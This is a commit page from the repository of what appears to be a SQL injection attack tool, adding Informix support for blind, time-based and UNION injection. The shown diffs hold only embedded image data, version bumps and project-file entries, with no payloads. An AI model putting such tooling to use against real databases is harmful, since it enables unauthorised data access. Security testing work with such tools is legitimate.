shack2/SuperSQLInjectionV1
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

update 20190303

Browse Source 
新增支持Informix注入(盲注,延时,Union)。
This commit is contained in:
shack2
2019-03-03 22:17:41 +08:00
parent cac99f5095
commit 7058ce7325
11 changed files with 1161 additions and 340 deletions
Download Patch File Download Diff File Expand all files Collapse all files

444
SuperSQLInjection/Main.Designer.cs generated
View File

File diff suppressed because it is too large Load Diff

728
SuperSQLInjection/Main.cs
View File

File diff suppressed because it is too large Load Diff

147
SuperSQLInjection/Main.resx
View File

@@ -137,7 +137,7 @@
AAEAAAD/////AQAAAAAAAAAMAgAAAFdTeXN0ZW0uV2luZG93cy5Gb3JtcywgVmVyc2lvbj00LjAuMC4w AAEAAAD/////AQAAAAAAAAAMAgAAAFdTeXN0ZW0uV2luZG93cy5Gb3JtcywgVmVyc2lvbj00LjAuMC4w
LCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODkFAQAAACZTeXN0 LCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODkFAQAAACZTeXN0
ZW0uV2luZG93cy5Gb3Jtcy5JbWFnZUxpc3RTdHJlYW1lcgEAAAAERGF0YQcCAgAAAAkDAAAADwMAAACq ZW0uV2luZG93cy5Gb3Jtcy5JbWFnZUxpc3RTdHJlYW1lcgEAAAAERGF0YQcCAgAAAAkDAAAADwMAAACq
DQAAAk1TRnQBSQFMAgEBBwEAAagBCQGoAQkBEAEAARABAAT/AQkBAAj/AUIBTQE2AQQGAAE2AQQCAAEo DQAAAk1TRnQBSQFMAgEBBwEAAcABCQHAAQkBEAEAARABAAT/AQkBAAj/AUIBTQE2AQQGAAE2AQQCAAEo
AwABQAMAASADAAEBAQABCAYAAQgYAAGAAgABgAMAAoABAAGAAwABgAEAAYABAAKAAgADwAEAAcAB3AHA AwABQAMAASADAAEBAQABCAYAAQgYAAGAAgABgAMAAoABAAGAAwABgAEAAYABAAKAAgADwAEAAcAB3AHA
AQAB8AHKAaYBAAEzBQABMwEAATMBAAEzAQACMwIAAxYBAAMcAQADIgEAAykBAANVAQADTQEAA0IBAAM5 AQAB8AHKAaYBAAEzBQABMwEAATMBAAEzAQACMwIAAxYBAAMcAQADIgEAAykBAANVAQADTQEAA0IBAAM5
AQABgAF8Af8BAAJQAf8BAAGTAQAB1gEAAf8B7AHMAQABxgHWAe8BAAHWAucBAAGQAakBrQIAAf8BMwMA AQABgAF8Af8BAAJQAf8BAAGTAQAB1gEAAf8B7AHMAQABxgHWAe8BAAHWAucBAAGQAakBrQIAAf8BMwMA
@@ -242,8 +242,8 @@
<value> <value>
AAEAAAD/////AQAAAAAAAAAMAgAAAFdTeXN0ZW0uV2luZG93cy5Gb3JtcywgVmVyc2lvbj00LjAuMC4w AAEAAAD/////AQAAAAAAAAAMAgAAAFdTeXN0ZW0uV2luZG93cy5Gb3JtcywgVmVyc2lvbj00LjAuMC4w
LCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODkFAQAAACZTeXN0 LCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODkFAQAAACZTeXN0
ZW0uV2luZG93cy5Gb3Jtcy5JbWFnZUxpc3RTdHJlYW1lcgEAAAAERGF0YQcCAgAAAAkDAAAADwMAAABO ZW0uV2luZG93cy5Gb3Jtcy5JbWFnZUxpc3RTdHJlYW1lcgEAAAAERGF0YQcCAgAAAAkDAAAADwMAAACe
GQAAAk1TRnQBSQFMAgEBDwEAATABCgEwAQoBEAEAARABAAT/AQkBAAj/AUIBTQE2AQQGAAE2AQQCAAEo GQAAAk1TRnQBSQFMAgEBDwEAAWgBCgFoAQoBEAEAARABAAT/AQkBAAj/AUIBTQE2AQQGAAE2AQQCAAEo
AwABQAMAAUADAAEBAQABCAYAARAYAAGAAgABgAMAAoABAAGAAwABgAEAAYABAAKAAgADwAEAAcAB3AHA AwABQAMAAUADAAEBAQABCAYAARAYAAGAAgABgAMAAoABAAGAAwABgAEAAYABAAKAAgADwAEAAcAB3AHA
AQAB8AHKAaYBAAEzBQABMwEAATMBAAEzAQACMwIAAxYBAAMcAQADIgEAAykBAANVAQADTQEAA0IBAAM5 AQAB8AHKAaYBAAEzBQABMwEAATMBAAEzAQACMwIAAxYBAAMcAQADIgEAAykBAANVAQADTQEAA0IBAAM5
AQABgAF8Af8BAAJQAf8BAAGTAQAB1gEAAf8B7AHMAQABxgHWAe8BAAHWAucBAAGQAakBrQIAAf8BMwMA AQABgAF8Af8BAAJQAf8BAAGTAQAB1gEAAf8B7AHMAQABxgHWAe8BAAHWAucBAAGQAakBrQIAAf8BMwMA
@@ -283,75 +283,76 @@
AQcEAAHzCAAB8xMAAfQBDgG8AfACAAFDAv8BQwIAAfABvAEOAfQBAAH/AYYEZQL0BGUBhgH/BAAB8wYA AQcEAAHzCAAB8xMAAfQBDgG8AfACAAFDAv8BQwIAAfABvAEOAfQBAAH/AYYEZQL0BGUBhgH/BAAB8wYA
AvAB8hQAAQcBDgH0AfABEAEAAkMBAAEQAfAB9AEOAQcDAAHxBGUC9ARlAfEFAAHzBgAB8AHzFQAB/wHr AvAB8hQAAQcBDgH0AfABEAEAAkMBAAEQAfAB9AEOAQcDAAHxBGUC9ARlAfEFAAHzBgAB8AHzFQAB/wHr
AQ4BvAH/AfACkgHwAf8BvAEOAesB/wQAAfMBhgZlAYYB8gYAB/IB8xcAAf8BBwEOARMBkgLwAZIBEwEO AQ4BvAH/AfACkgHwAf8BvAEOAesB/wQAAfMBhgZlAYYB8gYAB/IB8xcAAf8BBwEOARMBkgLwAZIBEwEO
AQcB/wYAAf8BBwGuAoYBrgEHAf8oAAH0Ae8B7AIRAewB7wH0NAAB8QHvAbwB8wL0BP8C9AGTAW8BBw0A AQcB/wYAAf8BBwGuAoYBrgEHAf8oAAH0Ae8B7AIRAewB7wH0QAAB/wH0BAAB7QEOAQ8BDgEAAQ4DAAEO
Af8B9AQAAe0BDgEPAQ4BAAEOAwABDgEAAe0IAAH/AfAB9wHvAbwB8wH/AwAB7wHyAfcBvAf/AZMBbwGU AQAB7RIAAfEB7wG8AfMC9AT/AvQBkwFvAQcMAAHwAg4B7wMAARMB9wHyAfcBvAHwAQcBEQHyAfEB7wET
AW8MAAHwAg4B7wMAARMB9wHyAfcBvAHwAQcBEQHyAfEB7wETCAAB8gHtA64B9wHwAf8CAAHxAfcB8QH3 EgAB7wHyAfcBvAf/AZMBbwGUAW8FAAb/AfIBDgFDARQBDgHzAgABEwH3AewBEQHyAQAB8gH3AZIBBwHv
AfEFAAGTAW8BFgFvAQcFAAb/AfIBDgFDARQBDgHzAgABEwH3AewBEQHyAQAB8gH3AZIBBwHvARMHAAHz ARMCAALsBAAD7AQAAuwBAAHxAfcB8QH3AfEFAAGTAW8BFgFvAQcEAAL/AfEB7wHsAe0B9wHsARECFAEO
Au0BbQIUAW0B7QHzAwAB8QHvAfAB7wHxAwABkwFvARYBbwEaBQAC/wHxAe8B7AHtAfcB7AERAhQBDgH/ Af8CAAETAfcB7AEAAfMB7AHzARUB8gHrAREBEwIAAewB/wTsAf8B7AH/BOwB/wHsAgAB8QHvAfAB7wHx
AgABEwH3AewBAAHzAewB8wEVAfIB6wERARMGAAH0AfcBrgHtARIB7AESARUBEwHxBAAB8QHvAbwB7wHx AwABkwFvARYBbwEaBAAB/wH0AQcB7wHwAfMB8gHwAfcBbQETAQ8BBwMAAhMBFQEAAQ8B7AEPAQABQwHt
AQABkwFvARYBbwEaBQAB/wH0AQcB7wHwAfMB8gHwAfcBbQETAQ8BBwMAAhMBFQEAAQ8B7AEPAQABQwHt AUMBEwIAAewF/wHsAf8B7AX/AewDAAHxAe8BvAHvAfEBAAGTAW8BFgFvARoFAAH/AgcB8AG0AosBtAHw
AUMBEwUAAf8B7wKuAe0BEgHvAd0BBwHrAbwFAAHxAe8BvAEHAbwBbwHjAW8BGgYAAf8CBwHwAbQCiwG0 AQcBbQHvBAAB7ArwAewCAAHsBv8B7Ab/AewEAAHxAe8BvAEHAbwBbwHjAW8BGgYAAfIB7wHxAYoEsgGt
AfABBwFtAe8EAAHsCvAB7AQAAf8BBwOuAe0B6gHvAfAB3QGSAe8GAAHxAQcBbwFFAeMBFgEaBwAB8gHv AfIB7wHyBAAB7QEAAf8FBwG8AgAB7QIAAewB/wHsAf8B7AH/AewB/wHsBf8B7AUAAfEBBwFvAUUB4wEW
AfEBigSyAa0B8gHvAfIEAAHtAQAB/wUHAbwCAAHtAwAB/wG8Au0CrgHtAeoBBwHxAfAC9wH/BgAB8QFG ARoHAAEHAfEBtAGzBbIBtAHxAQcEAAHtAQAB8gH/A/QB/wG8AgAB7QIAAewC/wHsA/8B7Ab/AewGAAHx
AZQBRgG8CAABBwHxAbQBswWyAbQB8QEHBAAB7QEAAfIB/wP0Af8BvAIAAe0DAAHzAfcDtQLtAeoBvAHz AUYBlAFGAbwIAAH3AfQGswGyAbMB9AH3BAAB7QEAAfIB/wP0Af8BvAIAAe0CAAHsAf8B7AP/AewB/wHs
AfIB7wHtAf8GAAEHARwCbwEHAu8BBwHwAf8DAAH3AfQGswGyAbMB9AH3BAAB7QEAAfIB/wP0Af8BvAIA Bf8B7AYAAQcBHAJvAQcC7wEHAfAB/wMAAe8B9AGzAbkGswH0Ae8EAAHtAQAB8gH/A/QB/wG8AgAB7QIA
Ae0DAAHzBrUBbQHwAf8B9AG8AewB/wUAAgcBvAHyAbwCBwK8AgcB/wIAAe8B9AGzAbkGswH0Ae8EAAHt AewC/wLsAv8B7Ab/AewFAAIHAbwB8gG8AgcCvAIHAf8CAAEHAfIBugG5AdsB2gLbAbkBugHyAQcEAAHt
AQAB8gH/A/QB/wG8AgAB7QMAAfMGtQHrAfIC/wHyAewB9AQAAQcCvAEAAf8BvAIHAbwB7wHxAQcB8QIA AQAB8gH/A/QB/wG8AgAB7QIAAewB/wHsA/8B7AH/AewF/wHsBAABBwK8AQAB/wG8AgcBvAHvAfEBBwHx
AQcB8gG6AbkB2wHaAtsBuQG6AfIBBwQAAe0BAAHyAf8D9AH/AbwCAAHtAwAB8wa1AewB7QH3Ae8BvAHs AgAB8wEHAfQBswTbAbMB8wEHAfMEAAHtAQAB8gX3AewC9AHsAgAB7AL/AuwC/wHsBv8B7AMAAQcCvAMA
AfQDAAEHArwDAAHwArwB7wHzAQcB8gHwAgAB8wEHAfQBswTbAbMB8wEHAfMEAAHtAQAB8gX3AewC9AHs AfACvAHvAfMBBwHyAfADAAHxAfAB8wG6AbQCugHzAvEFAAHtAQAB8gHrARMBEQJtAwABkgIAAuwE/wHs
AwAB8wIJAgcDtQH3Ae0C7AFtAfMBAAHxAQcC8AQAAfEB8AHvAfMBAAH/AfAB8QMAAfEB8AHzAboBtAK6 Af8B7AT/AuwBAAHxAQcC8AQAAfEB8AHvAfMBAAH/AfAB8QMAAf8B8QEHAfMB9AH/AfMBvAHxAf8FAAHt
AfMC8QUAAe0BAAHyAesBEwERAm0DAAGSAwAB8wEJAd0CCQG8At0D8wG8AfcB8gEAAbwB8wHwBQAB8gG8 AQAB/wHzAfIB8QLyARABAAHrAf8EAATsAQAB7AEABOwDAAG8AfMB8AUAAfIBvAHxAe8B/wEAAv8FAAHz
AfEB7wH/AQAC/wMAAf8B8QEHAfMB9AH/AfMBvAHxAf8FAAHtAQAB/wHzAfIB8QLyARABAAHrAf8DAAHz AfACBwHwAfMHAAHtBwABEQETAf8TAAHyAfEB8gUAAf8B8QHwAfIBvAH/FAAB9wftARUB/x0AAf8B8wLx
A90FGQHzAvQB8QHyAQAB8gHxAfIFAAH/AfEB8AHyAbwB/wcAAfMB8AIHAfAB8wcAAe0HAAERARMB/wQA Af8kAAH/AbQCAAEHCBIBBxEADv8RAAG1BM8BAAHqCP8B6gQAAQcBcgFPA0kBcgEHBQABBwzrAQcGAAH/
AfMBGQHzBfQB8wLxAfIB8wH/CgAB/wHzAvEB/xQAAfcH7QEVAf8FAAH0AvEE8AHxAfMB9AH/BgAB/wG0 AfQC8wH/BfMB/wHPAQAB/wG0AgABbQH/AvQE8wH/AW0DAAGYAU8BUASYAU8BSQEcBAAB6wwHAesCAAH/
AgABBwgSAQcQ/wESBBUB/wFDASoC/wHvAhUBEhIAAbUEzwEAAeoI/wHqAf8O1AH/AW0F/wEqAfYCIwP/ AZoBTAGaAf8DbwEaBW8B9AHPBQABbQH/AfQF8wH/AW0CAAGYAU8BeAEIAZgClwGYAQgBlwFJARwDAAHs
AW0SAAHPAQAB/wG0AgABbQH/AvQE8wH/AW0B/wHUAtwBGQL0ARkB3AHbAdoB0wHUAdsB1AH/AW0B/wPz AbwKDwG8AewBAAH/ARYBlAH0AQAB/wnzAf8GAAHrAf8G8wH/AesBAAEHAU8BeAEIBpcBCAGXAUkBBwIA
Af8BKgH2AcMBegGmAv8BbQIAAuwEAAPsBAAC7AEAAc8FAAFtAf8B9AXzAf8BbQH/AdQC3AEZAvQBGQHc AewB8AoQAfAB7AEAAfQBbwMAAfQJbwH0AbsFbAHsAf8G8wH/AewBAAF4AVYBCAKXAXgBGwGYA5cBCAFP
AdsB2gHTAdQB2wHUAf8BbQH/A/QC/wEqAXoBswHTAaYB/wEHAgAB7AH/BOwB/wHsAf8E7AH/AewHAAHr AXICAAHsAfEBEAIRAv8BEQH/AhEBEAHxAewBAAEaAZMDAAH/BRoBGwMaAf8BiwUZAewB/wbzAf8B7AEA
Af8G8wH/AesB/wHUAhkB9AL/AfQBGQEJA9wBCQHUAf8B6wH/BPQB/wEqAQkB4gGzAdMBpgL/AQAB7AX/ AVACmAGXAXgD/wGYApcCmAFPAgAB7AHxAREBQwH/BkMBEQHxAewBAAH0AUYB/wIAAf8FGgEbAxoB/wGL
AewB/wHsBf8B7AEAAbsFbAHsAf8G8wH/AewB/w7UAf8B6wH/BPQC/wGsAQkB4gGzAdMBpgL/AewG/wHs BRkB7AH/BPMD/wHsAQABTwGYAZcBeAL/AfQC/wGYApcBmAFJAgAB7AHyAREBFQH/AxUB/wIVAREB8gHs
Bv8B7AEAAYsFGQHsAf8G8wH/AewB/wHUAtwBGQL0ARkB3AHbAdoB0wHUAdsB1AH/AesB/wX0Av8BrAEJ AgACbwH/BwAB/wEaAf8CAAGQBRkB7QH/BPMB/wLtAfABAAFVAQgBeAGXAQgB8QGXAQgC/wGYAZcBmAFP
AeIBswHTAaYB/wHsAf8B7AH/AewB/wHsAf8B7AX/AewBAAGLBRkB7AH/BPMD/wHsAf8B1ALcARkC9AEZ AgAB7AHzAUMCFQL/BBUBQwHzAewCAAH/AZMBJQH0BQABGgFGASUBkwIAAZAFGQGSBv8BkgEHAgABVgKY
AdwB2wHaAdMB1AHbAdQB/wHrCf8BrAEJAeIBswEmASAB7AL/AewD/wHsBv8B7AEAAZAFGQHtAf8E8wH/ BZcBCAH/AfMCmAFPAgAB7AH0AUMIFAFDAfQB7AQAARsBTAH/BAAB9AEaARYBRgH/AQABswUZAQcG9wHw
Au0B8AH/AdQC3AEZAvQBGQHcAdsB2gHTAdQB2wHUAf8B7Ar/AawBCQH/ASYBIAHsAf8B7AP/AewB/wHs AwABmAGXAQgGlwEIAZcBCAFQAZcCAAHtAf8KQwH/Ae0FAAEaAW8B9gIAAf8BGgFMAf8B9AH/AQABswUZ
Bf8B7AEAAZAFGQGSBv8BkgEHAQAB/wHUAhkB9AL/AfQBGQEJA9wBCQHUAf8B7Av/AawBJgHeASUB7AL/ AgkBGQGzBwABCAFWAXgBCAaXAQgBeAFPAQcCAAHtDP8B7QYAARsBTAFGAW8BRgGTAf8EAAG5BBkBCQMZ
AuwC/wHsBv8B7AEAAbMFGQEHBvcB8AIAAf8O1AH/AewJ/wL0Af8BJQEgAf8B7AH/AewD/wHsAf8B7AX/ AbkEAAHPAwABmAFWAXgBCAGYAngBmAEIAXgBTwGYAwAB8AztAfAIAAL/BwABuQMZAgkBGQK5AQkB/wG0
AewBAAGzBRkCCQEZAbMGAAH/AdQC3AEZAvQBGQHcAdsB2gHTAdQB2wHUAf8B7Aj/AbUC6gEHA/8B7AL/ AgABzwQAAZgBVgGXBJgBlwFQAZgjAAG5BhkBuQG6AQAEzwG1BQABCAGYBFYBmAEHJAABCQa5AQkCAAH/
AuwC/wHsBv8B7AEAAbkEGQEJAxkBuQQAAc8BAAH/AdQC3AEZAvQBGQHcAdsB2gHTAdQB2wHUAf8B7Aj/ AbQXAALwAbwB7wKRAe8BvALwAwAQ/wYAAf8B8AH3Ae8BvAHzAf8DAAESBBUB/wFDASoC/wHvAhUBEgQA
AbUD/wH3AgAC7AT/AewB/wHsBP8C7AEAAbkDGQIJARkCuQEJAf8BtAIAAc8BAAH/AdQCGQH0Av8B9AEZ AbwBBwH3Ae8BswLbAbMC7wEHAbwCAAH/DtQB/wYAAfIB7QOuAfcB8AH/AgABbQX/ASoB9gIjA/8BbQMA
AQkD3AEJAdQB/wHsCP8BtQL/AfcFAATsAQAB7AEABOwDAAG5BhkBuQG6AQAEzwG1AQAB/w7UAf8B7Qj/ AfABuwKzAZABugLbAboBkAKzAbsB8AEAAf8B1ALcARkC9AEZAdwB2wHaAdMB1AHbAdQB/wUAAfMC7QFt
AbUB/wH3FAABCQa5AQkCAAH/AbQEABD/Cu0B90gAAvABvAHvApEB7wG8AvAHAAEHAXIBTwNJAXIBBwUA AhQBbQHtAfMCAAFtAf8D8wH/ASoB9gHDAXoBpgL/AW0DAAHwAbQC3AbbAtwBtAHwAQAB/wHUAtwBGQL0
Dv8DAAG8DAABBwIAAbwBBwH3Ae8BswLbAbMC7wEHAbwFAAGYAU8BUASYAU8BSQEcBAABBwzrAQcCAAHz ARkB3AHbAdoB0wHUAdsB1AH/BAAB9AH3Aa4B7QESAewBEgEVARMB8QIAAW0B/wP0Av8BKgF6AbMB0wGm
AQACBwr/AgAB8AG7ArMBkAG6AtsBugGQArMBuwHwAwABmAFPAXgBCAGYApcBmAEIAZcBSQEcAwAB6wwH Af8BBwMAAbwBswHcAtsB3ALbAdwC2wHcAbMBvAEAAf8B1AIZAfQC/wH0ARkBCQPcAQkB1AH/AwAB/wHv
AesFAAP0CP8CAAHwAbQC3AbbAtwBtAHwAgABBwFPAXgBCAaXAQgBlwFJAQcCAAHsAbwKDwG8AewCAAHz Aq4B7QESAe8B3QEHAesBvAIAAesB/wT0Af8BKgEJAeIBswHTAaYC/wEAAbwB7wG0A9sBswK6AbMD2wG0
AQACBwP0B/8CAAG8AbMB3ALbAdwC2wHcAtsB3AGzAbwCAAF4AVYBCAKXAXgBGwGYA5cBCAFPAXICAAHs Ae8BvAH/DtQB/wIAAf8BBwOuAe0B6gHvAfAB3QGSAe8CAAHrAf8E9AL/AawBCQHiAbMB0wGmAv8BBwGz
AfAKEAHwAewFAAP0AesBDgEQAewBEQP/AQABvAHvAbQD2wGzAroBswPbAbQB7wG8AQABUAKYAZcBeAP/ AboB2wHcAbMBvAIAAbwBswHcAdsBugGzAQcB/wHUAtwBGQL0ARkB3AHbAdoB0wHUAdsB1AH/AQAB/wG8
AZgClwKYAU8CAAHsAfEBEAIRAv8BEQH/AhEBEAHxAewCAAHzAQACBwH0AfABAAHwAfQB7QEAA/8BAAEH Au0CrgHtAeoBBwHxAfAC9wH/AQAB6wH/BfQC/wGsAQkB4gGzAdMBpgH/AbsB2wLcAdsBtAQAAbQB2wLc
AbMBugHbAdwBswG8AgABvAGzAdwB2wG6AbMBBwEAAU8BmAGXAXgC/wH0Av8BmAKXAZgBSQIAAewB8QER AdsBuwH/AdQC3AEZAvQBGQHcAdsB2gHTAdQB2wHUAf8BAAHzAfcDtQLtAeoBvAHzAfIB7wHtAf8BAAHr
AUMB/wZDAREB8QHsBQAC8wHyAQ4B7AHzAbwBAAH0Av8BAAG7AdsC3AHbAbQEAAG0AdsC3AHbAbsBAAFV Cf8BrAEJAeIBswEmASABuwHbA9wBtAG8AvABvAG0A9wB2wG7Af8B1ALcARkC9AEZAdwB2wHaAdMB1AHb
AQgBeAGXAQgB8QGXAQgC/wGYAZcBmAFPAgAB7AHyAREBFQH/AxUB/wIVAREB8gHsAgAB8wEAAQcB7wLz AdQB/wEAAfMGtQFtAfAB/wH0AbwB7AH/AQAB7Ar/AawBCQH/ASYBIAG8AbMC2wHcAbMBkgIHAZIBswHc
AQcBEwEOAQ8BAAL0Af8BAAG7AdsD3AG0AbwC8AG8AbQD3AHbAbsBAAFWApgFlwEIAf8B8wKYAU8CAAHs AtsBswG8Af8B1AIZAfQC/wH0ARkBCQPcAQkB1AH/AQAB8wa1AesB8gL/AfIB7AH0AQAB7Av/AawBJgHe
AfMBQwIVAv8EFQFDAfMB7AUAA/MBvAHyAfQB7AEQA/QBAAG8AbMC2wHcAbMBkgIHAZIBswHcAtsBswG8 ASUBAAG8AbQB2wHhAdwBswKQAbMB3AHhAdsBtAG8AQAB/w7UAf8BAAHzBrUB7AHtAfcB7wG8AewB9AEA
AQABmAGXAQgGlwEIAZcBCAFQAZcCAAHsAfQBQwgUAUMB9AHsAgAB8wEAAQcB7wLzAewBDwEOAREB7wP0 AewJ/wL0Af8BJQEgAf8BAAG8AbMBGQPhAtwD4QEZAbMBvAEAAf8B1ALcARkC9AEZAdwB2wHaAdMB1AHb
AgABvAG0AdsB4QHcAbMCkAGzAdwB4QHbAbQBvAIAAQgBVgF4AQgGlwEIAXgBTwEHAgAB7QH/CkMB/wHt AdQB/wEAAfMCCQIHA7UB9wHtAuwBbQHzAQAB7Aj/AbUC6gEHA/8CAAG0AdwB4gLbAuEC2wHiAdwBtAIA
BQAB8gfzA/QCAAG8AbMBGQPhAtwD4QEZAbMBvAMAAZgBVgF4AQgBmAJ4AZgBCAF4AU8BmAMAAe0M/wHt Af8B1ALcARkC9AEZAdwB2wHaAdMB1AHbAdQB/wEAAfMBCQHdAgkBvALdA/MBvAH3AfIBAAHsCP8BtQP/
AgAB8wEAAQcB7wLyBvMC9AMAAbQB3AHiAtsC4QLbAeIB3AG0BQABmAFWAZcEmAGXAVABmAQAAfAM7QHw AfcEAAG7AbQBswG0AdsC4gHbAbQBswG0AbsCAAH/AdQCGQH0Av8B9AEZAQkD3AEJAdQB/wEAAfMD3QUZ
BQAE8gfzAwABuwG0AbMBtAHbAuIB2wG0AbMBtAG7BgABCAGYBFYBmAEHFQAB8wEADP8FAAK8AbMC2wGz AfMC9AHxAfIBAAHsCP8BtQL/AfcHAAK8AbMC2wGzArwEAAH/DtQB/wEAAfMBGQHzBfQB8wLxAfIB8wH/
ArwmAAG8DAABvAYAAbwCuwG8BgABQgFNAT4HAAE+AwABKAMAAUADAAFAAwABAQEAAQEGAAECFgAD/wEA AQAB7Qj/AbUB/wH3CgABvAK7AbwGABD/AQAB9ALxBPAB8QHzAfQB/wQACu0B9wUAAUIBTQE+BwABPgMA
AfABDwT/AgABwAEDAfABDwL/AgABgAEBAeABBwHgAQcCAAGAAQEBwAEDAe8B9wQAAoEB4AEHAgABAQGA ASgDAAFAAwABQAMAAQEBAAEBBgABAhYAA/8BAAHwAQ8E/wIAAcABAwHwAQ8C/wIAAYABAQHgAQcB4AEH
AoEB7wGHAgABAQGAAoEB7wHDAgABAQGAAoEB4AEBBAABgAEBAeABAQQAAYABAQHgARcEAAGAAQEB7wH3 AgABgAEBAcABAwHvAfcEAAKBAeABBwIAAQEBgAKBAe8BhwIAAQEBgAKBAe8BwwIAAQEBgAKBAeABAQQA
BAABgAEBAe8BxwIAAYABAQHAAQMB7wHPAgABgAEBAeABBwHgAR8CAAHAAQMB8AEPAv8CAAHwAQ8E/wMA AYABAQHgAQEEAAGAAQEB4AEXBAABgAEBAe8B9wQAAYABAQHvAccCAAGAAQEBwAEDAe8BzwIAAYABAQHg
AQEB/wHzAcABAwH8AQcBAAEBAf8B4QHAAQMB/AEDAQcBwQHwAQABwAEDAfgBAwKDAeABAAHAAQMB8AED AQcB4AEfAgABwAEDAfABDwL/AgAB8AEPBP8CAAH/AfMBwAEDAv8BAAEBAf8B4QHAAQMC/wEAAQEB8AEA
AcEBBwHAAQEBwAEDAeABAwHgAQ8BwAEDAcABAwHAAQMB8AEfAcABAwHQARsBgAEBAfgBPwHAAQMB0AEb AcABAwE8AXkBBwHBAeABAAHAAQMBAAEBAoMBwAEBAcABAwEAAQEBwQEHAcABAwHAAQMBAAEBAeABDwHA
AYABAQH4AQEBwAEDAdABGwGAAQEB8AEAAcABAwHQARsBgAEBAeIBAAHAAQMB0AEbAYABAQHHAQABwAED AQMB0AEbAQABAQHwAR8BwAEDAdABGwEAAQEB+AE/AcABAwHQARsBAAEBAfgBAQHAAQMB0AEbAQABAQHw
AdABAwGAAQEBDwEIAeABBwHQAQMBgAEBAR8BBAHgAQcB0AEDAYABAQEfAQMB+AEfAd8BxwGAAQEB/wGD AQABwAEDAdABGwEAAQEB4gEAAcABAwHQAQMBAAEBAccBAAHgAQcB0AEDAQABAQEPAQgB4AEHAdABAwHC
Av8BwAEPAYABDwHMBAABAwL/AQQEAAEDAv8BTAQAAQMBPAF5AXwEAAEDAQABAQH8BAABAQEAAQEHAAEB AYcBHwEEAfgBHwHfAccC/wEfAQMC/wHAAQ8D/wGDBP8BzAEAAv8BgAEBAv8BBAEAAfABDwGAAQEB+AEA
BwABAQcAAQEHAAEBAQABAQUAAQEBAAEDBQABAQEAAT8FAAEBAQABPQMAAQMBAAEBAQABDQMAAQcBwgGH AUwBAAHgAQcBgAEBAYABAAF8AQABwAEDAYABAQEIAQAB/AEAAYABAQGAAQEBOAMAAYABAQGAAQEBOAMA
AQABQQMAAQ8C/wEAAc8DAAEfCP8B4AEHAfABDwGAAQEBwAEAAcABAwHgAQcBgAEBAYABAAGAAQEBwAED AYABAQGAAQEBGAMAAYABAQGAAQEBjwHjAgABgAEBAYABAQGHAcMBAAEBAYABAQGAAQEB4wHBAQABAwGA
AYABAQGAAQABgAEBAYABAQGAAQEBgAEAAYABAQGAAQEBgAEBAYADAAGAAQEBgAEBAYABAAEBAoABAQGA AQEBgAEBAfEBgQEAAT8BgAEBAYABAQH4AQ8BAAE9AcABAwGAAQEB/gF/AQABDQHgAQcE/wEAAUEB8AEP
AQEBgAEAAQMBwAGAAQEBgAEBAYADAAGAAQEBgAEBAYADAAGAAQEBgAEBAYABAAGAAQEBgAEBAYABAQGA BP8BAAHPAv8B4AEHAgAB/AEHAQABAwHAAQMCAAH8AQMBAAEDAYABAQIAAfgBAwEAAQMBgAEBAgAB8AED
AQABgAEBAcABAwGAAQEBgAEAAcABAwHgAQcBgAEBAYABAAHAAQMB8AEPAv8BgAEAAfABDwT/AcABAAH8 AQABAwGAAQECAAHgAQMBAAEBBAABwAEDAgABAQGAAgABgAEBAgABAwHAAgABgAEBBgABgAEBBgABgAEB
AT8L AgABgAEBAgABgAEBAgABgAEBAgABgAEBAgABwAEDAgABgAEBAQABAwHAAQMCAAGAAQEBAAEHAfABDwIA
AYABAQEAAQ8B/AE/AgABgAEPAQABHws=
</value> </value>
</data> </data>
<metadata name="toolStrip_getVers.TrayLocation" type="System.Drawing.Point, System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a"> <metadata name="toolStrip_getVers.TrayLocation" type="System.Drawing.Point, System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a">
@@ -409,7 +410,7 @@ Cache-Control: no-cache,no-store</value>
<value>329, 17</value> <value>329, 17</value>
</metadata> </metadata>
<metadata name="$this.TrayHeight" type="System.Int32, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089"> <metadata name="$this.TrayHeight" type="System.Int32, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089">
<value>151</value> <value>100</value>
</metadata> </metadata>
<data name="$this.Icon" type="System.Drawing.Icon, System.Drawing" mimetype="application/x-microsoft.net.object.bytearray.base64"> <data name="$this.Icon" type="System.Drawing.Icon, System.Drawing" mimetype="application/x-microsoft.net.object.bytearray.base64">
<value> <value>

4
SuperSQLInjection/Properties/AssemblyInfo.cs
View File

@@ -32,5 +32,5 @@ using System.Runtime.InteropServices;
// 可以指定所有这些值,也可以使用“内部版本号”和“修订号”的默认值, // 可以指定所有这些值,也可以使用“内部版本号”和“修订号”的默认值,
// 方法是按如下所示使用“*”: // 方法是按如下所示使用“*”:
// [assembly: AssemblyVersion("1.0.*")] // [assembly: AssemblyVersion("1.0.*")]
[assembly: AssemblyVersion("1.2019.01.20")] [assembly: AssemblyVersion("1.2019.03.03")]
[assembly: AssemblyFileVersion("1.2019.01.20")] [assembly: AssemblyFileVersion("1.2019.03.03")]

BIN
SuperSQLInjection/Properties/images/bypass.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 493 B

1
SuperSQLInjection/SuperSQLInjection.csproj
View File

@@ -153,6 +153,7 @@
<Compile Include="payload\Access.cs" /> <Compile Include="payload\Access.cs" />
<Compile Include="payload\Comm.cs" /> <Compile Include="payload\Comm.cs" />
<Compile Include="model\Injection.cs" /> <Compile Include="model\Injection.cs" />
<Compile Include="payload\Informix.cs" />
<Compile Include="payload\SQLite.cs" /> <Compile Include="payload\SQLite.cs" />
<Compile Include="payload\DBPayload.cs" /> <Compile Include="payload\DBPayload.cs" />
<Compile Include="payload\DB2.cs" /> <Compile Include="payload\DB2.cs" />

3
SuperSQLInjection/model/DBType.cs
View File

@@ -14,6 +14,7 @@ namespace SuperSQLInjection.model
Oracle = 4, Oracle = 4,
PostgreSQL=5, PostgreSQL=5,
DB2 = 6, DB2 = 6,
